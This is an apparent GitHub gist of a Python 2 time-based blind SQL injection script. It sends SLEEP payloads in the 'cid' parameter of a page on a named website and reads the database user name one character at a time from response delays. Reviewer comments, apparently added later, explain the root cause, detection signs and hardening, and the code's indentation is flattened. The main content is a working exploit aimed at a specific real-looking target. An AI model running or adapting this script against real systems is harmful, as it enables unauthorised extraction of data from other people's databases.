
@imfht imfht/sqlinj.py
Created Jan 21, 2019

SQL盲注脚本 (blind SQL injection script)
#!/usr/bin/env python
# encoding: utf-8
# vip.py
# ringzero@0x557.org
import requests
import time
import sys
# NOTE(review): the page extraction appears to have flattened this listing's
# indentation; the nesting (two `for` loops and one `if`) has to be read from
# the trailing colons. The statements are reproduced exactly as shown.
#
# Summary: a time-based blind SQL injection probe. Each request embeds a SQL
# fragment in the `cid` query parameter that makes the database sleep only
# when one guessed character of USER() is correct, so the response latency is
# the only signal the script reads.
#
# Defender notes:
#   * Root cause (presumed, server code is not shown): the `cid` value reaches
#     a SQL statement without being bound as a parameter or coerced to an
#     integer. Binding or integer-casting the value removes the issue.
#   * Detection: `cid` values containing SLEEP( / ASCII(MID( ... USER(),
#     bursts of requests from one client that differ only in two integers,
#     and responses that take about five seconds.
#   * Hardening: a low-privilege database account and a server-side statement
#     time limit reduce what a delay-based side channel can reveal.

# Python 2 only: `reload` as a builtin and sys.setdefaultencoding do not exist
# in Python 3 (the `print` statement further down is Python 2 syntax as well).
reload(sys)
sys.setdefaultencoding('utf-8')
# Candidate alphabet: lowercase letters, digits, and '@', '_', '.'.
payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
# Character positions 1 through 19 of the value being read.
for i in range(1,20):
# Try every candidate character for the current position.
for _str in payloads:
# Wall-clock timestamp taken just before the request is sent.
start_time = time.time()
# The comparison ASCII(MID(LOWER(USER()), i, 1)) = ord(_str) evaluates to 1 or
# 0 and is multiplied by 5, so the query calls SLEEP(5) on a match and
# SLEEP(0) otherwise. `stock`, `order` and `page` are sent as constant 9.
url = "http://www.vip.com/beauty.php?cid=9);(SELECT * FROM (SELECT(SLEEP((ASCII(MID(LOWER(USER())," + str(i) + ",1))=" + str(ord(_str)) + ")*5)))ring)&stock=9&order=9&page=9"
# The body is fetched but never inspected; no timeout is passed to requests.
result = requests.get(url).text
# Anything slower than 3 seconds is treated as the 5-second sleep having fired.
if(time.time() - start_time) > 3:
# Emit the matched character and stop testing candidates for this position.
print _str
break